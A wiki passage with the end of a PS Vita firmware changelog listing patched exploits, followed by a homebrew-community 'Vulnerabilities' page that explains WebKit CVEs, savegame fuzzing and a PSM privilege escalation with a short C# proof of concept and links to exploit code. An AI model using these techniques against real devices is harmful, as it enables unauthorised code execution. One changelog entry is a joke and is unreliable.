* The rendering engine has been improved.<br />
* The [Browser] now uses additional GPU processing power.<br />
* Tapping on a YouTube link will now open the respective video in the YouTube app.<br />
* The HTML5 and JavaScript engines have been upgraded.<br />
* Users can now send their current [Browser] URL using their Twitter settings.<br />
* Users can now access the [Browser] while in an application or game.<ref>Shuhei Yoshida on Twitter. https://twitter.com/yosp/status/270429820712783872</ref><br />
* A pointer can now be used (in conjunction with pressing L or R and tapping on the screen) to select links.<br />
<br />
;Apps<br />
* [Email] has been added as an application.<br />
<br />
;Maps<br />
* [Maps] can now display weather information for locations where it is available.<br />
<br />
;Near<br />
* The layout of [Near] has been revised.<br />
<br />
;Friends<br />
* The activities list for Friends has been moved to the LiveArea screen.<br />
* Users can now attach a comment when sending a friend request.<br />
* Users can now file a [Grief Report] for inappropriate comments when sent with a friend request.<br />
* TIFF, BMP, PNG, GIF, and MPO are now supported as file formats in [Group Messaging].<br />
<br />
;Videos<br />
* The PS Vita system can now display videos with 1080 resolution.<br />
* Videos can now display captioning.<br />
* Videos can now be played in slow motion.<br />
* Users can now skip chapters in videos.<br />
* Folders can now be transferred from a PS3 or PC to the PS Vita for [Photos] and [Videos].<br />
* When browsing lists in Music and Videos, titles will now scroll horizontally if they are too long.<br />
<br />
;PSone Classics<br />
* [Assign Touchscreen] and [Assign Rear Touch Pad] have been added to [Controller Settings].<br />
* [Custom] has been added to [Other Settings] > [Screen Mode].<br />
|-<br />
|align=center|'''2.01'''<ref>[http://www.playstationlifestyle.net/2012/12/03/ps-vita-firmware-v2-01-is-live-download-now/ PS Vita Firmware v2.01 is Live, Download Now]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 3, 2012<br />
|<br />
;PlayStation Plus<br />
* Issue with the [Upload Automatically] setting for saved data has now been corrected.<br />
<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.02'''<ref>[http://www.playstationlifestyle.net/2012/12/18/playstation-vita-system-software-version-2-02-now-available-for-download/ PlayStation Vita System Software Version 2.02 Now Available For Download]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 19, 2012<br />
|<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.05'''<ref>[http://www.playstationlifestyle.net/2013/01/22/ps-vita-system-software-version-2-05-likely-coming-today-seems-to-be-mandatory/ PS Vita System Software Version 2.05 Likely Coming Today, Seems to be Mandatory]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><br />January 24, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in UNO game. <br />
|-<br />
|align=center|'''2.06'''<ref>[https://twitter.com/PlayStation/status/311264776577765376 Twitter / PlayStation: Heads up - PS Vita v2.06 software]. Twitter.com. Retrieved on 2013-08-23.</ref><br />March 12, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in Dissidia Duodecim PSP game.<br />
* Closes JavaScript URL spoofing exploit in Browser.<ref>[http://www.securityfocus.com/archive/1/525576 Sony Playstation Vita Browser - firmware 2.05 - Adressbar spoofing]. Securityfocus.com. Retrieved on 2013-12-09.</ref><br />
|-<br />
|align=center|'''2.10'''<ref>[http://blog.us.playstation.com/2013/04/09/ps-vita-system-software-update-v-2-10/ PS Vita System Software Update (v.2.10) – PlayStation.Blog]. Blog.us.playstation.com (2013-04-09). Retrieved on 2013-08-23.</ref><ref>[http://uk.playstation.com/psvita/support/system-software/detail/item596991/Update-features-%28ver-2-10%29/ Update features (ver 2.10) - PS Vita System Software]. Uk.playstation.com. Retrieved on 2013-08-23.</ref><br />April 9, 2013<br />
|<br />
;System<br />
* Users can now create folders, with a maximum of 10 icons per folder, and up to 100 icons (including folders) on the home screen.<br />
* Users can now verify which PS Vita card is in their system by looking at the information bar.<br />
* Users can now save home screen layouts per PS Vita card.<br />
* When [Mute Automatically] is toggled in [Settings], the PS Vita will mute speakers when a headset is unplugged. Similarly, music will now pause if a headset is unplugged when the music app is used.<br />
* [Use Wi-Fi in Power Save Mode] has been added to [Power Save Settings].<br />
* [Disconnect Wi-Fi Connection Automatically] has been removed.<br />
* Patches an exploit in the game Apache Overkill.<ref>09 September 2013, [http://wololo.net/2013/04/10/mandatory-vita-2-10-update-live-and-blocks-apache-overkill-exploit/ Mandatory Vita 2.10 Update Live and Blocks Apache Overkill Exploit], Wololo.net</ref><br />
<br />
;PlayStation Plus<br />
* PlayStation Plus members can now automatically update [PlayStation Mobile] software and upload game save data using a 3G connection.<br />
* Users can now upload or download game save data using a 3G network.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been added (a memory card is required; some videos are not supported).<br />
<br />
;Email<br />
* Enhancements to [Email] now allow users to view HTML messages, add multiple email addresses to contacts, and search messages.<br />
<br />
;Group Messaging<br />
* Users can now send messages to multiple recipients.<br />
<br />
;Photos<br />
* Still images can now be displayed in high resolution when zoomed in.<br />
<br />
;Content Manager<br />
* Users can now check for system updates when plugging their PS Vita into their PS3 system. The system version of the PS3 must be 4.40 or higher.<br />
* Users can now add a name for the PS Vita backup data when saving to a PS3 or PC. The system version of the PS3 must be 4.40 or higher, and the Content Manager Assistant application must be updated.<br />
<br />
;PlayStation Store<br />
* When reporting PlayStation Mobile content as inappropriate, users can now include details.<br />
|-<br />
|align=center|'''2.11'''<ref>[http://www.psu.com/a019092/PS-Vita-firmware-211-is-now-live [UPDATE&#93; PS Vita firmware 2.11 is now live - PlayStation Universe]. Psu.com (2013-04-16). Retrieved on 2013-08-23.</ref><br />April 16, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
* Stabilizes the playback of certain titles.<br />
|-<br />
|align=center|'''2.12'''<ref>[http://terminalgamer.com/2013/05/07/optional-ps-vita-system-update-2-12-live-now/ Optional PS Vita System Update 2.12 Live Now]. Terminal Gamer (2013-05-08). Retrieved on 2013-08-23.</ref><br />May 8, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
|-<br />
|align=center|'''2.50'''<br />''Pre-installed Only''<br><br />
First found on October 10, 2013<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PCH-2000 model.<br />
*It adds support for PlayStation Vita Slim (PCH-2000), but otherwise the firmware is identical to the previous version (2.12).<br />
|-<br />
|align=center|'''2.60'''<ref>[http://www.playstationlifestyle.net/2013/08/05/ps-vita-firmware-update-v2-60-released-download-now/ PS Vita Firmware Update v2.60 Released, Download Now]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><ref>[http://wololo.net/2013/08/06/psvita-mandatory-ofw-2-60-now-live/ PSVITA Mandatory OFW 2.60 Now Live ·]. Wololo.net (2013-08-06). Retrieved on 2013-08-23.</ref><br />August 5, 2013<br />
|<br />
* Default release firmware for the PlayStation Vita TV in Japan.<br />
;System<br />
* [Devices] has been added under [Settings].<br />
** [Bluetooth Settings] has been moved to [Devices].<br />
* The Quick Access Menu when the PS button is held has been improved.<br />
* Stability improvements.<br />
* Anti-aliasing has been applied to home screen icons.<br />
* Closes exploit in Gamocracy One: Legend of Robot.<br />
* Closes undisclosed exploit in Pool Hall Pro.<br />
* Fixes screenshot compression bug for ''Gravity Rush'' and ''Everybody's Golf'' introduced in firmware 2.10.<br />
<br />
;LiveArea<br />
* The LiveArea for [Content Manager] and [Photos] has been updated.<br />
<br />
;PlayStation Plus<br />
* A [PlayStation Plus] icon has been added to the LiveArea to allow users to easily upload or download saved data.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been extended.<br />
<br />
;Content Manager<br />
* Users can now use content on a remote system before transferring it.<br />
<br />
;Trophies<br />
* Trophies can now be hidden.<br />
|-<br />
|align=center|'''2.61'''<ref>[http://www.playstationlifestyle.net/2013/08/28/ps-vita-system-firmware-update-v2-61-coming-soon-improves-some-software-stability/ PS Vita System Firmware Update v2.61 Coming Soon, Improves Some Software]. PlayStation LifeStyle. Retrieved on 2013-08-28.</ref><br />August 28, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within Arcade Darts and other games has been patched, disallowing the usage of VHBL via the game.<ref>29 August 2013, [http://wololo.net/2013/08/29/ps-vita-compulsory-firmware-2-61-is-out-patches-the-arcade-exploits/ PS Vita compulsory Firmware 2.61 is out, patches the ‘Arcade’ exploits], Wololo.net</ref><br />
|-<br />
|}<br />
<br />
=== Version 3 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''3.00'''<br />November 5, 2013<br />
|<br />
;System<br />
* [Parental Controls] has been added to the home screen.<br />
* Future system software updates can now be downloaded automatically.<br />
* Portuguese (Portugal) language has been updated to reflect changes due to the Portuguese Language Orthographic Agreement of 1990.<br />
* System stability has been improved.<br />
* Several game exploits (Fieldrunners and others, most of them undisclosed) have been fixed. This disallows the usage of VHBL via these games.<ref>11 November 2013, [http://wololo.net/2013/11/11/sony-patched-up-to-20-exploits-with-vita-firmware-3-00/ Sony patched up to 20 exploits with Vita firmware 3.00], Wololo.net</ref><br />
<br />
;Trophies<br />
* Trophies for PS4 software can now be displayed on PS Vita.<br />
<br />
;Content Manager<br />
* Users can now transfer content to and from a PS3 with Wi-Fi on the same network, when the PS3 is version 4.50 or newer.<br />
<br />
;Messages<br />
* [Group Messaging] has been renamed to [Messages].<br />
* The icon has been changed.<br />
* Messages can now be sent to and from the PS4 and mobile devices running the PlayStation App.<br />
<br />
;Email<br />
* Contacts can now be synchronized from Gmail and Yahoo! Mail using CardDAV.<br />
<br />
;Party<br />
* The icon has been changed.<br />
* Users can now voice and text chat with friends on PS4.<br />
<br />
;Remote Play<br />
* [Remote Play] has been renamed to [PS3 Remote Play].<br />
<br />
;PS4 Link<br />
* [PS4 Link] has been added to the home screen.<br />
<br />
;Friends<br />
* The layout for the [Friends] application has changed. There are now four tabs available:<br />
** Find Player on PSN<br />
** Friends<br />
** Friend Requests<br />
** Players Blocked<br />
<br />
;Photos<br />
* Users can now take panoramic photos with the PS Vita's camera.<br />
* Panoramic photos can be viewed using the system's motion sensor.<br />
|-<br />
|align=center|'''3.01'''<ref name="PSVita301">[http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits]. Wololo.net. Retrieved on 2013-12-10.</ref><br />December 5, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within several games has been patched, disallowing the usage of VHBL/eCFW via the games.<ref>10 December 2013, [http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits], Wololo.net</ref><br />
|-<br />
|align=center|'''3.10'''<ref name="PSVita310">[http://blog.eu.playstation.com/2014/03/25/playstation-vita-system-software-update-3-10-coming-soon/ PS Vita System Software Update 3.10 Coming Soon]. PlayStation Blog. Retrieved on 2014-03-25.</ref><br />March 25, 2014<br />
|<br />
;System<br />
* The number of applications that can be displayed on the home screen has increased to 500.<br />
* [Adjust Daylight Savings Automatically] has been added.<br />
* [30 minutes] has been added to [Enter Standby Mode Automatically].<br />
* (''Japan only'') PocketStation functionality has been integrated into the system software.<ref name=fami310>2014-03-25, [http://www.famitsu.com/news/201403/25050481.html PS Vita、PS Vita TVのシステムソフトウェア バージョン3.10が提供開始、カレンダー機能追加など盛りだくさん!], Famitsu</ref><br />
* Added DualShock 4 compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Added PlayStation Mobile compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Use of an [External Keyboard] is now supported (for example, PlayStation Bluetooth Wireless Keypad).<br />
* Savegame exploits in various exploit titles got fixed.<br />
* Savegame exploits in various additional undisclosed exploit titles got fixed as well.<br />
* Internal firmware changes now prevent the execution of bigger files (e.g. TN-V/ARK eCFW) via exploits in PSP Minis, if these PSP Minis lack network functions.<br />
<br />
;Apps<br />
* Added a new [Calendar] application that synchronizes with Google Calendar.<br />
<br />
;Content Manager<br />
* Added [Manage Content on Memory Card] option.<br />
<br />
;Messages<br />
* Messages sent and received now include voice messages.<br />
<br />
;Parental Controls<br />
* Access to the PS Store can now be restricted.<br />
* Added a children's age guide.<br />
<br />
;Music<br />
* Users can now search on connected devices such as a PC.<br />
<br />
;Video<br />
* Users can now sort content by size.<br />
<br />
;Photo<br />
* [Rotate Screen Automatically] has been added.<br />
* [Freeform] has been added to the list of panoramic options.<br />
|-<br />
|align=center|'''3.12'''<ref name="PSVita312">[http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/ PS Vita mandatory firmware 3.12 available – Fixes memory card problems]. Wololo.net. Retrieved on 2014-03-28.</ref><br />March 28, 2014<br />
|<br />
;System<br />
* System software stability during use of some features has been improved.<br />
* Fixes problems with bigger memory cards,<ref>http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/</ref> which occurred in system software 3.10.<br />
|-<br />
|align=center|'''3.15'''<br />April 30, 2014<br />
|<br />
;System<br />
* ''(PS Vita TV only)'' Full functionality for PlayStation Vita TV remote play with PS4 systems added.<ref>2014-04-17, [http://www.famitsu.com/news/201404/17051793.html PS4“システムソフトウェア バージョン1.70”の内容が公開、ニコニコ生放送や各配信サービス内の動画アーカイブへの対応、HDCP信号オフなど], Famitsu</ref><ref>2014-04-17, [http://weekly.ascii.jp/elem/000/000/214/214642/ PS4がバージョン1.70へのアップデートでニコ生HD配信などに対応!], Weekly ASCII</ref><br />
* Savegame exploits in various undisclosed exploit titles have been fixed.<ref>http://wololo.net/2014/04/30/ps-vita-firmware-3-15-is-now-available/</ref><br />
<br />
; PS4 Link<br />
* Linking PS Vita with PS4 is now easier.<br />
|-<br />
|align=center|'''3.18'''<br />August 7, 2014<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*No entry sign changed.<br />
|-<br />
|align=center|'''3.20'''<br />''Pre-installed Only''<br><br />
First found on October 14, 2014<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PlayStation TV in North America and Europe.<br />
*It allows the usage of non-Asian PSN accounts on the PS TV, if set up via PS3 or proxies, but otherwise the firmware is identical to the previous version (3.18).<br />
|-<br />
|align=center|'''3.30'''<br />October 2, 2014<br />
|<br />
;System<br />
* [Theme & Background] has been added to [Settings].<br />
* The full array of languages has been added to [External Keyboard] settings (previously Japanese and US English only).<ref name=330jp/><br />
* [Import Saved Data] feature has now been fixed after becoming broken with release of system software 3.15.<br />
* PS4 Remote Play now supports two players simultaneously.<ref name=330jp/><br />
* Added timezone for Nouméa and daylight savings support for Wellington, New Zealand.<br />
* "Intellectual Property Notices" are now listed in the app menu on the LiveArea screen.<br />
* A savegame exploit, several kernel exploits, a WebKit exploit and some internal system flaws have been fixed.<ref>http://wololo.net/2014/10/04/ps-vita-firmware-3-30-what-is-patched-what-is-still-working/</ref><br />
<br />
;Trophies<br />
* Trophy rarity can now be viewed.<br />
<br />
;Calendar<br />
* Users can now attach and send events created in [Calendar] to [Messages] and [Email]. Recipients can save those events in their own calendars.<br />
* Users can now add Friends and other players to events created in [Calendar].<br />
* The Calendar app’s LiveArea now supports the next six tagged events.<ref name=330jp/><br />
<br />
;Browser<br />
* The system's [Browser] now supports closing all open windows.<ref name=330jp>[http://www.jp.playstation.com/psvita/update/ PlayStation®Vita/PlayStation®TV システムソフトウェア バージョン3.30 アップデートについて], Accessed 2 October 2014</ref><br />
* Improvements to the [Browser]'s ability to load pages and compatibility with HTML5/Javascript content have been made. HTML5test score increased from 291 to 345.<ref>2014-10-01, [http://www.psnstores.com/2014/10/ps-vita-system-update-3-30-now-live-adds-themes-improves-browser-allows-ps-vita-tv-to-use-na-accounts/ PS Vita System Update 3.30 Now Live: Adds Themes, Improves Browser, Allows PS Vita TV To Use NA Accounts], PSNStores</ref><br />
<br />
;Content Manager<br />
* Support for Content Manager Assistant with Windows XP and Mac OS X Leopard has been discontinued.<br />
<br />
;PS TV<br />
* The name of the VTE-1000 series has been changed to PlayStation TV or PS TV within system applications.<ref>2014年10月2日, [http://www.jp.playstation.com/info/support/sp_20141002_psvitatv.html PlayStation®Vita TVのシステムソフトウェア上の表記変更について], Sony Computer Entertainment Japan</ref><br />
* A maximum of 4 wireless controllers can be connected to the PS TV. The number of players depends on the game or application.<br />
* North American and European PSN accounts can now be used with the PlayStation TV.<br />
* Detailed warning prompt added to Standby/Shutdown screen on PlayStation TV devices.<br />
|-<br />
|align=center|'''3.35'''<br />October 28, 2014<br />
|<br />
;System<br />
*A savegame exploit in the PSP game Go! Sudoku has been fixed.<br />
*Enables compatibility with the Live from PlayStation app (requires firmware 3.30 or higher) available to download from the PS Store.<br />
;PS4 Link<br />
*Four-player Remote Play support to PlayStation TV.<br />
*Users can now adjust the video quality for Remote Play on the PS TV system according to the network environment.<br />
|-<br />
|align=center|'''3.36'''<br />January 14, 2015<br />
|<br />
;System<br />
*Fixes some internal functions of the PS Vita's PSP emulator.<br />
*A savegame exploit in an undisclosed PSP game has been fixed.<br />
*The PSP Emulator of the PS Vita has been updated to PSP firmware 6.61.<br />
|-<br />
|align=center|'''3.50'''<br />March 26, 2015<br />
|<br />
;System<br />
*Adds support for streaming in 60 frames per second while using PS4 Remote Play. If 60fps is enabled, the PS4 system will be unable to record gameplay while using Remote Play.<br />
*Accessibility has been added to the settings menu, with options such as zooming, inverted colors, closed captions, enlarged text and increased contrast options.<br />
*The Maps application has been removed.<br />
*'near' will not show Maps and other related content anymore.<br />
*PSN has been renamed to PlayStation Network.<br />
*The [Chat] setting under [PlayStation Network] > [Sub Account Management] has been renamed as [Chat/User-Generated Media].<br />
*Sub account users can now be restricted from sending and receiving [Messages from other players] in [Messages].<br />
*The online-status of friends is no longer shown with a pop-up box.<br />
*Fixed savedata exploits in various PSP games (Arcade Darts, Patapon 2, Numblast, etc.).<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<br />
*30% of the 256 MB of memory reserved for the operating system is now free for games.<br />
|-<br />
|align=center|'''3.51'''<br />May 13, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Additional fixes for the "custom bubble" exploit.<br />
*Fixes lag some users reported on the home screen of the system.<br />
|-<br />
|align=center|'''3.52'''<br />June 23, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Revoked PlayStation Mobile.<ref name="Rejuvenate">http://wololo.net/2015/06/24/ps-vita-firmware-3-52-is-out-revokes-psm-support-effectively-patching-the-rejuvenate-hack-do-not-update/</ref><br />
*Fixed the "Rejuvenate" exploit.<ref name="Rejuvenate" /><br />
|-<br />
|align=center|'''3.55'''<ref>https://web.archive.org/web/20150930182904/https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />September 30, 2015<br />
|<br />
;System<br />
*Fixed the Mail Writer exploit.<ref name="Fail-Mail">http://wololo.net/2015/09/30/playstation-vita-firmware-3-55-is-now-available-does-it-patch-the-fail-mail-flaw/</ref><br />
*Fixes several PSP usermode exploits.<ref name="Fail-Mail" /><br />
;PS4 Link<br />
*You can now adjust the setting for video resolution when using remote play on a PS Vita system. Select (PS4 Link) > [Start] > (Options) > [Settings] > [Video Quality for Remote Play] > [Resolution]. <br />
** If video or audio skips during playback, try selecting [Low (360p)] to help improve the quality.<br />
;Parental Controls<br />
*You can now restrict [Email] from starting.<br />
|-<br />
|align=center|'''3.57'''<ref>http://gematsu.com/2016/01/ps3-ps-vita-ending-facebook-link-support</ref><br />January 20, 2016<br />
|<br />
;System<br />
*Removed the system-wide Facebook integration.<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<ref>http://wololo.net/2016/01/20/playstation-vita-system-software-3-57-is-now-available-fixes-currently-testing/</ref><br />
|-<br />
|align=center|'''3.60'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />April 6, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
|-<br />
|align=center|'''3.61'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />August 8, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
*Fixed <code>sceIoDevctl</code> uninitialized stack memory leak used by HENkaku.<br />
*Fixed WebKit <code>JSArray::sortCompactedVector</code> vulnerability used by HENkaku.<br />
|-<br />
|align=center|'''3.63'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />November 1, 2016<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
*Fixed <code>sceNetIoctl</code> use-after-free used by HENkaku.<br />
|-<br />
|align=center|'''3.65'''<br />April 18, 2017<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Fixed PSP emulator kernel exploit used by ARK.<br />
|-<br />
|align=center|'''3.67'''<br />November 28, 2017<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
<hr><br />
*Twitter dialog updated.<br />
*Calendar icon updated.<br />
*Added TLS 1.2 support in the web browser.<br />
*Fixed Ensō exploit.<br />
|-<br />
|align=center|'''3.68'''<br />April 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Minor WebKit update (vector index masking).<ref name="WebKit-368">https://gist.github.com/StepS-/436098ac8979217d263bab2edab11ee5</ref><br />
*Fixed some devkit-specific kernel bugs.<ref name="DevKit-367">[https://twitter.com/theflow0/status/985137344570372096 Sony has fixed 3 kernel bugs in 3.68, which combined, could lead to kernel code execution on a devkit]. TheFloW (@theflow0) on Twitter</ref><ref name="DevKit-367-sceMotionDevGetEvaInfo">[https://twitter.com/theflow0/status/984919058863845378 sceMotionDevGetEvaInfo could leak 0x48 bytes of kernel stack]. TheFloW (@theflow0) on Twitter</ref><br />
|-<br />
|align=center|'''3.69'''<br />September 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Fixed some bugs in SceNgs<br />
*SSL library updated (along with other networking libraries that use SceSsl); two new root certificates added<br />
|-<br />
|align=center|'''3.70'''<br />January 14, 2019<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Changed the enc key<br />
*Forgot to change any other keys. Oops!<br />
|-<br />
|align=center|'''3.71'''<br />July 23, 2019<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Fixed the Trinity exploit chain<br />
|-<br />
|align=center|'''3.72'''<br />August 27, 2019<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
|-<br />
|}<br />
<br />
[[Category:Firmware]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=11408Vulnerabilities2019-08-28T23:03:45Z<p>Xyz: </p>
<hr />
<div>== Userland ==<br />
<br />
=== WebKit exploits ===<br />
<br />
==== WebKit exploits in Email app ====<br />
<br />
Implemented by xyz so that HENkaku could be launched offline.<br />
<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup].<br />
<br />
==== WebKit 531.22.8 (Vita FW <= 1.81) ====<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit, CVE-2010-4577,<ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref> using type confusion to treat a double as a string memory address and length. The other is a type confusion exploit, CVE-2010-1807, on the parseFloat() function using a NaN as the argument.<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
==== WebKit 536.26 (Vita FW 2.00-3.20) (CVE-2012-3748) (PSA 2013-09-03-1) ====<br />
<br />
Ported to PSVita by many many people. Patched on FW 3.30.<br />
<br />
The heap memory buffer overflow vulnerability exists within the WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts the user-defined JavaScript function and calls it from the native code to compare array items. If this compare function reduces array length, then the trailing array items will be written outside the "m_storage->m_vector[]" buffer, which leads to the heap memory corruption.<br />
<br />
[http://packetstormsecurity.com/files/123088/ Packet Storm Exploit 2013-0903-1 - Apple Safari Heap Buffer Overflow]<br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ====<br />
<br />
Ported to PSVita by xyz. Patched on FW 3.50.<br />
<br />
The CSSSelectorList can be mutated after it's allocated. If the mutated list contains fewer entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.50-3.60) (JSArray::sortCompactedVector) ====<br />
<br />
Discovered by xyz. Implemented in HENkaku by Molecule Team. Patched in FW 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit commented code by St4rk]<br />
<br />
==== WebKit 537.73 (Vita FW 3.30-3.71) (to be disclosed) ====<br />
<br />
Will be released at the same time as xyz's next kernel exploit, named 2050 and 2051.<br />
<br />
Working on <= 3.71. Not patched yet.<br />
<br />
=== PSM (PlayStation Mobile) exploits ===<br />
<br />
PSM apps for PSVita were removed from the PSStore in 2015. Nevertheless, a set of tricks allows installing and using PSM on any PSVita on FW <=3.51.<br />
<br />
PSM apps can't work on FW >=3.52 because they are blacklisted in the PSVita OS. This can be bypassed only with a kernel exploit and the ref00d plugin.<br />
<br />
==== PSM Dev For Unity can be installed without PSStore ====<br />
<br />
PSM Dev For Unity is packed into a DRM-free .pkg. It can therefore be installed using PKG Installer or the BGDL .pkg trick. Not patchable.<br />
<br />
==== PSM+ ====<br />
<br />
A PSM developer license can be spoofed using filesystem write access and signed with keys.<br />
<br />
==== PSM Mono privilege escalation ====<br />
<br />
See [https://yifan.lu/2015/06/21/hacking-the-ps-vita/ writeup by yifan lu].<br />
<br />
==== PSM Unity privilege escalation ====<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource based hacks just as difficult as unsigned code execution hacks (which is the original goal).<br />
<br />
==== PSM NetworkRequest privilege escalation ====<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes callback with <code>SecurityCritical</code> allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature <ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
public class AppMain<br />
{<br />
[SecurityCritical]<br />
public static void Escalate (IAsyncResult result)<br />
{<br />
Console.WriteLine("Should be SecurityCritical");<br />
IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
}<br />
<br />
public static void Main (string[] args)<br />
{<br />
Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
Network.AuthGetTicket();<br />
NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
while (!result.IsCompleted)<br />
{<br />
Console.WriteLine("waiting...");<br />
}<br />
Console.WriteLine("Completed!");<br />
}<br />
}<br />
}<br />
</source><br />
<br />
=== Game savedata exploits ===<br />
<br />
Discovered in 2015 by TheFlow. Released on 2018-06-29.<br />
<br />
This sort of exploit works in theory on any firmware (not patchable, or only with difficulty).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
h-encore uses a different entry point than its predecessor HENkaku. Instead of a WebKit exploit, it is using a gamesave exploit. The reason for that is after firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in their browser, which prevented us from loading additional sysmodules. This limitation is crucial, since this was the only way we could get more syscalls (than the browser uses), as they are randomized at boot and only assigned to syscall slots if any user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kexploits.<br />
<br />
==== Old games do not have ASLR ====<br />
<br />
The reason why a gamesave exploit is possible on such a system is that games developed with SDK 2.60 and lower were compiled as statically linked executables, thus their loading address is always the same, namely 0x81000000, and they cannot be relocated to another region. They also don't have stack protection enabled by default, which means that if we can stack smash in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process: you just fuzz gamesaves by writing random data at random locations until you get a crash (the best bet is extending strings and hoping that you can smash the stack).<br />
<br />
==== Bittersmile game buffer overflow (h-encore) ====<br />
<br />
Bittersmile game found exploitable on 2018-02-17 by Freakler. Implemented in h-encore by TheFloW.<br />
<br />
